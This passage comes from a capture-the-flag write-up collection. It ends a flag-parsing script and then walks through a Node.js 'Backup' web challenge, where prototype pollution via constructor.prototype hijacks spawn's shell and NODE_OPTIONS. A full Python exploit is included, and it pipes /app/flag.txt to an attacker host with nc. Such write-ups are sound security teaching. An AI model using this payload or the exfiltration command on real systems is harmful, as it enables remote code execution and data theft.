bio = re.search(r'<textarea[^>]*>(.*?)</textarea>', r2.text, re.DOTALL)
if bio:
bio_content = html.unescape(bio.group(1))
flags = re.findall(r'DDC\{[^}]+\}', bio_content, re.I)
if flags:
print(f"FLAG: {flags}")
for fname in ["/tmp/flag_data.html", "/tmp/flag_data2.html"]:
if os.path.exists(fname):
with open(fname) as f:
fc = f.read()
flags = re.findall(r'DDC\{[^}]+\}', fc, re.I)
if flags:
print(f"giga goldklumpen: {flags}")
|
Flag: DDC{c0rsic4_w3lcomes_y0u_w1th_0pen_arms}
Backup (Web Exploitation)
I’m just a simple backup service.
Attached file: web_backup.zip
Solution: We get a Node.js service that takes a JSON config, merges it with defaults and finally runs spawn("echo", ["System OK"]).
The merge function blocks __proto__, but not constructor.prototype. So I can prototype-pollute Object.prototype via user input.
The spawn options only contain {stdio, timeout}, so fields like shell and env are looked up through the prototype chain. I therefore set:
shell = "/proc/self/exe"
env.NODE_OPTIONS = "--require /proc/self/environ"
That means the process effectively runs:
|
node --check "echo System OK"
|
but with a --require first.
I cannot write files, so instead I load /proc/self/environ. It contains the environment variables (KEY=value\0...). If the first variable is a JavaScript payload ending in //, the rest of the file is commented out, because NUL is not a JS line terminator.
The payload then executes cat /app/flag.txt and sends the flag to my server via nc.
|
import sys, json, ssl, urllib.request
def exploit(target, host, port):
cmd = f"cat /app/flag.txt|nc {host} {port}"
payload = {
"constructor": {
"prototype": {
"shell": "/proc/self/exe",
"env": {
"_PAYLOAD": f"require('child_process').execSync('{cmd}')//" ,
"NODE_OPTIONS": "--require /proc/self/environ",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"env": None,
"shell": None,
}
}
}
}
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
req = urllib.request.Request(
target.rstrip("/") + "/archive",
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, context=ctx, timeout=15) as r:
print(json.loads(r.read()))
exploit(sys.argv[1], sys.argv[2], int(sys.argv[3]))
|
Flag: DDC{pr0t0type_p0llution_1s_ins4ne}
Speedrun (Cryptography)
Writeup missing…
Stackless (Reverse Engineering)
Writeup missing…